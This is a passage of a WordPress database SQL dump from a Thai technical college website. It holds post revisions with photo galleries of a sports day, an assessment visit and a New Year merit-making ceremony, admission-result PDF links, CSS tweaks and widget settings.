href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-12.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-12-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-13.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-13-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-14.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-14-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-15.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-15-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-16.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-16-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-17.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-17-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-18.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-18-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-19.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-19-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-20.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-20-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>', 'กิจกรรมแข่งขันกีฬาภายในสถานศึกษา \"เทคนิคระยองเกมส์\"', '\"เทคนิคระยองเกมส์\" ...', 'inherit', 'closed', 'closed', '', '320-revision-v1', '', '', '2018-01-06 21:39:56', '2018-01-06 14:39:56', '', 320, 'http://sim.technicrayong.ac.th/?p=420', 0, 'revision', '', 0),
(421, 1, '2018-01-06 21:40:59', '2018-01-06 14:40:59', 'วิทยาลัยเทคนิคระยอง เข้ารับการประเมินองค์การมาตรฐานดีเด่น องค์การนักวิชาชีพในอนาคตแห่งประเทศไทย ระดับสถานศึกษาขนาดใหญ่ ระดับภาค ภาคตะวันออกและกรุงเทพมหานคร ประจำปีการศึกษา 2560 (รอบสอง) วันที่ 25 ธันวาคม 2560\r\n<p style=\"text-align: center;\"><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-01.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-01-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-02.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-02-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-03.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-03-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-04.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-04-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-05.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-05-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-06.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-06-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-07.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-07-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-08.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-08-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-09.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-09-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-10.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-10-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>', 'วิทยาลัยเทคนิคระยอง เข้ารับการประเมินองค์การมาตรฐานดีเด่น', 'รอบสอง ...', 'inherit', 'closed', 'closed', '', '342-revision-v1', '', '', '2018-01-06 21:40:59', '2018-01-06 14:40:59', '', 342, 'http://sim.technicrayong.ac.th/?p=421', 0, 'revision', '', 0),
(422, 1, '2018-01-06 21:42:20', '2018-01-06 14:42:20', 'คณะผู้บริหารวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะครู บุคลากรทางการศึกษา และนักเรียน นักศึกษา ร่วมทำบุญตักบาตรข้าวสารอาหารแห้ง พระสงฆ์จากวัดลุ่มมหาชัยชุมพล จำนวน 19 รูป เนื่องในโอกาสวันขึ้นปีใหม่ ณ โดมหน้าองค์พระวิษณุกรรม วันที่ 27 ธันวาคม 2560\r\n<p style=\"text-align: center;\"><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-01.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-01-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-02.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-02-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-03.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-03-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-04.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-04-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-05.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-05-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-06.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-06-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-07.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-07-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-08.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-08-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-09.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-09-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /> </a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-10.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-10-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>', 'ทำบุญตักบาตรข้าวสารอาหารแห้ง', 'เนื่องในโอกาสวันขึ้นปีใหม่ ...', 'inherit', 'closed', 'closed', '', '354-revision-v1', '', '', '2018-01-06 21:42:20', '2018-01-06 14:42:20', '', 354, 'http://sim.technicrayong.ac.th/?p=422', 0, 'revision', '', 0),
(428, 1, '2018-01-06 22:26:15', '2018-01-06 15:26:15', '.home-section-news-and-events .news-post:nth-child(2n+1) {\n clear: none;\n}\n\n.home-section-news-and-events .news-post {\n width: 33%;\n}\n\n\n.home-section-news-and-events .recent-events {\n width: 100%;\n}\n\n.home-section-news-and-events .recent-news {\n width: 100%;\n}\n\n', 'university-hub-pro', '', 'inherit', 'closed', 'closed', '', '380-revision-v1', '', '', '2018-01-06 22:26:15', '2018-01-06 15:26:15', '', 380, 'http://sim.technicrayong.ac.th/380-revision-v1/', 0, 'revision', '', 0),
(430, 1, '2018-01-06 22:29:13', '2018-01-06 15:29:13', '', 'university-hub-pro', '', 'inherit', 'closed', 'closed', '', '380-revision-v1', '', '', '2018-01-06 22:29:13', '2018-01-06 15:29:13', '', 380, 'http://sim.technicrayong.ac.th/380-revision-v1/', 0, 'revision', '', 0),
(432, 1, '2018-01-06 22:33:47', '2018-01-06 15:33:47', '.home-section-news-and-events .news-post:nth-child(2n+1) {\n clear: none;\n}\n\n.home-section-news-and-events .news-post {\n width: 33%;\n}\n\n.home-section-news-and-events .recent-news {\n display: none;\n}\n\n.home-section-news-and-events .recent-events {\n\n width: 100%;\n}', 'university-hub-pro', '', 'inherit', 'closed', 'closed', '', '380-revision-v1', '', '', '2018-01-06 22:33:47', '2018-01-06 15:33:47', '', 380, 'http://sim.technicrayong.ac.th/380-revision-v1/', 0, 'revision', '', 0),
(438, 1, '2018-01-06 22:44:50', '2018-01-06 15:44:50', '<h4>ประกาศผลการคัดเลือกนักศึกษาโควตา หลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.) และหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) ปีการศึกษา 2561</h4>\r\n<h4><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายใน.pdf\">ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายใน</a>\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายนอก.pdf\">ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายนอก</a></h4>\r\n<img class=\"aligncenter size-large wp-image-294\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/การสมัครออนไลน์-01-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" /> <img class=\"aligncenter size-large wp-image-293\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/การสมัครออนไลน์-02-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" /> <img class=\"aligncenter size-large wp-image-292\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/การสมัครออนไลน์-03-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" />', 'ประกาศผลการคัดเลือกนักศึกษาโควตา หลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.) และหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) ปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '287-revision-v1', '', '', '2018-01-06 22:44:50', '2018-01-06 15:44:50', '', 287, 'http://sim.technicrayong.ac.th/287-revision-v1/', 0, 'revision', '', 0),
(439, 1, '2018-01-06 22:45:33', '2018-01-06 15:45:33', '<h4><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายใน.pdf\">ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายใน</a>\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายนอก.pdf\">ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายนอก</a></h4>\r\n<img class=\"aligncenter size-large wp-image-294\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/การสมัครออนไลน์-01-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" /> <img class=\"aligncenter size-large wp-image-293\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/การสมัครออนไลน์-02-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" /> <img class=\"aligncenter size-large wp-image-292\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/การสมัครออนไลน์-03-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" />', 'ประกาศผลการคัดเลือกนักศึกษาโควตา หลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.) และหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) ปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '287-revision-v1', '', '', '2018-01-06 22:45:33', '2018-01-06 15:45:33', '', 287, 'http://sim.technicrayong.ac.th/287-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(441, 1, '2018-01-06 22:48:31', '2018-01-06 15:48:31', 'วิทยาลัยเทคนิคระยอง เข้ารับการประเมินองค์การมาตรฐานดีเด่น องค์การนักวิชาชีพในอนาคตแห่งประเทศไทย ระดับสถานศึกษาขนาดใหญ่ ระดับภาค ภาคตะวันออกและกรุงเทพมหานคร ประจำปีการศึกษา 2560 (รอบสอง) วันที่ 25 ธันวาคม 2560\r\n<p style=\"text-align: center;\"><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-01.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-01-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-02.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-02-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-03.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-03-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-04.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-04-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-05.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-05-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-06.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-06-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-07.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-07-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-08.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-08-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-09.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-09-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-10.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-10-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>', 'การประเมินองค์การมาตรฐานดีเด่น', 'รอบสอง ...', 'inherit', 'closed', 'closed', '', '342-revision-v1', '', '', '2018-01-06 22:48:31', '2018-01-06 15:48:31', '', 342, 'http://sim.technicrayong.ac.th/342-revision-v1/', 0, 'revision', '', 0),
(450, 1, '2018-01-06 16:38:01', '0000-00-00 00:00:00', '', 'widget_image', '', 'draft', 'closed', 'closed', '', '', '', '', '2018-01-06 16:38:01', '0000-00-00 00:00:00', 'a:1:{s:12:\"_multiwidget\";i:1;}', 0, 'http://sim.technicrayong.ac.th/?post_type=jetpack_migration&p=450', 0, 'jetpack_migration', '', 0),
(451, 1, '2018-01-06 16:38:01', '0000-00-00 00:00:00', '', 'sidebars_widgets', '', 'draft', 'closed', 'closed', '', '', '', '', '2018-01-06 16:38:01', '0000-00-00 00:00:00', 'a:12:{s:19:\"wp_inactive_widgets\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:6:\"meta-2\";i:5;s:12:\"categories-2\";}s:9:\"sidebar-1\";a:0:{}s:9:\"sidebar-2\";a:0:{}s:30:\"sidebar-front-page-widget-area\";a:0:{}s:15:\"extra-sidebar-1\";a:0:{}s:15:\"extra-sidebar-2\";a:0:{}s:15:\"extra-sidebar-3\";a:0:{}s:15:\"extra-sidebar-4\";a:0:{}s:8:\"footer-1\";a:0:{}s:8:\"footer-2\";a:0:{}s:8:\"footer-3\";a:0:{}s:8:\"footer-4\";a:1:{i:0;s:6:\"text-5\";}}', 0, 'http://sim.technicrayong.ac.th/?post_type=jetpack_migration&p=451', 0, 'jetpack_migration', '', 0),
(453, 1, '2018-01-07 00:53:27', '2018-01-06 17:53:27', '<h4><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายใน.pdf\">ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายใน</a>\r\n<a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายนอก.pdf\">ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายนอก</a></h4>\r\n<img class=\"aligncenter size-large wp-image-294\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/การสมัครออนไลน์-01-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" /> <img class=\"aligncenter size-large wp-image-293\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/การสมัครออนไลน์-02-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" /> <img class=\"aligncenter size-large wp-image-292\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/การสมัครออนไลน์-03-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" />', 'ประกาศผลการคัดเลือกนักศึกษาโควตา หลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.) และหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) ปีการศึกษา 2561', ' ', 'inherit', 'closed', 'closed', '', '287-revision-v1', '', '', '2018-01-07 00:53:27', '2018-01-06 17:53:27', '', 287, 'http://www.technicrayong.ac.th/287-revision-v1/', 0, 'revision', '', 0),
(455, 1, '2018-01-07 00:57:55', '2018-01-06 17:57:55', 'คณะผู้บริหารวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะครู บุคลากรทางการศึกษา และนักเรียน นักศึกษา ร่วมทำบุญตักบาตรข้าวสารอาหารแห้ง พระสงฆ์จากวัดลุ่มมหาชัยชุมพล จำนวน 19 รูป เนื่องในโอกาสวันขึ้นปีใหม่ ณ โดมหน้าองค์พระวิษณุกรรม วันที่ 27 ธันวาคม 2560\r\n<p style=\"text-align: center;\"><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-01.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-01-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-02.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-02-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-03.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-03-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-04.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-04-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-05.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-05-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-06.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-06-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-07.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-07-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-08.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-08-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-09.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-09-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /> </a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-10.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-10-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>', 'ทำบุญตักบาตรข้าวสารอาหารแห้ง', 'เนื่องในโอกาสวันขึ้นปีใหม่ ...', 'inherit', 'closed', 'closed', '', '354-revision-v1', '', '', '2018-01-07 00:57:55', '2018-01-06 17:57:55', '', 354, 'http://www.technicrayong.ac.th/354-revision-v1/', 0, 'revision', '', 0),
(456, 1, '2018-01-07 00:58:38', '2018-01-06 17:58:38', 'คณะผู้บริหารวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะครู บุคลากรทางการศึกษา และนักเรียน นักศึกษา ร่วมทำบุญตักบาตรข้าวสารอาหารแห้ง พระสงฆ์จากวัดลุ่มมหาชัยชุมพล จำนวน 19 รูป เนื่องในโอกาสวันขึ้นปีใหม่ ณ โดมหน้าองค์พระวิษณุกรรม วันที่ 27 ธันวาคม 2560\r\n<p style=\"text-align: center;\"><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-01.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-01-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-02.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-02-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-03.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-03-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-04.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-04-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-05.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-05-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-06.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-06-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-07.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-07-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-08.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-08-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-09.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-09-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /> </a><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-10.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-10-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>', 'ทำบุญตักบาตรข้าวสารอาหารแห้ง', 'เนื่องในโอกาสวันขึ้นปีใหม่ ...', 'inherit', 'closed', 'closed', '', '354-revision-v1', '', '', '2018-01-07 00:58:38', '2018-01-06 17:58:38', '', 354, 'http://www.technicrayong.ac.th/354-revision-v1/', 0, 'revision', '', 0),
